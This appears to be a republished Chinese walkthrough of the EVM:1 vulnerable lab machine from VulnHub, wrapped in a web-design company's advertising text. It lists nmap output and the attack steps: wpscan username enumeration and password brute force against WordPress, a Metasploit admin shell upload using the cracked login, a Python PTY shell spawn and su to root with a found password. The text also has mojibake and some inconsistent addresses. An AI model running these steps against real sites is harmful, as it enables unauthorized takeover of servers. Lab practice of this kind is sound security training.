一.環(huán)境搭建
我們提供的服務有:成都做網(wǎng)站、網(wǎng)站設計、微信公眾號開發(fā)�、網(wǎng)站優(yōu)化����、網(wǎng)站認證��、越城ssl等����。為上千多家企事業(yè)單位解決了網(wǎng)站和推廣的問題���。提供周到的售前咨詢和貼心的售后服務����,是有科學管理�����、有技術的越城網(wǎng)站制作公司
Vulhub是一個面向大眾的開源漏洞靶場�,無需docker知識,簡單執(zhí)行兩條命令即可編譯�、運行一個完整的漏洞靶場鏡像。旨在讓漏洞復現(xiàn)變得更加簡單��,讓安全研究者更加專注于漏洞原理本身��。
地址
https://www.vulnhub.com/entry/evm-1,391/
下載ova鏡像文件,vbox導入��,設置兩張?zhí)摂M網(wǎng)卡�,分別為NAT模式和僅主機模式(改為默認網(wǎng)卡配置)
ip為192.168.124.156
二.信息搜集:
(端口掃描)
nmap -A 192.168.124.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 EST
Nmap scan report for localhost (192.168.124.56)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| DNS-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open pop3?
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:C4:5F:AA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: ubuntu-extermely-vulnerable-m4ch2ine
| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
| Domain name: \x00
| FQDN: ubuntu-extermely-vulnerable-m4ch2ine
|_ System time: 2019-12-16T01:48:21-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-12-16 01:48:21
|_ start_date: N/A
(目錄掃描)
開始使用dirb進行目錄掃描dirb http://192.168.124.56/
從目錄掃描看出他有wordpress所以先試試之前使用過的工具wpscan
wpscan --url http://192.168.124.56/wordpress/ -e u
成功得到賬號c0rrupt3d_brain,現(xiàn)在繼續(xù)破解他的密碼
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt
成功破解出密碼24992499
現(xiàn)在開始使用msfconsole 使用模塊
unix/webapp/wp_admin_shell_upload
set RhOSTS 192.168.124.56
set USERNAME c0rrupt3d_brain
set PassWORD 24992499
set targeturi /wordpress
run
.jpg)
直接進入他的家目錄之后cd root3r 進來之后發(fā)現(xiàn)有一個文件似乎是root密碼文件
現(xiàn)在進行查看發(fā)現(xiàn)似乎是密碼�,既然已經(jīng)知道了密碼所以接下來進入交互頁面如下圖:
shell
python -c "import pty;pty.spawn('/bin/bash')"
su root
密碼輸入為:willy26
成功拿到root
網(wǎng)站欄目:Vulhub-EVM1靶機的使用方法
路徑分享:
http://weahome.cn/article/pesipe.html
重慶分公司
重慶分公司
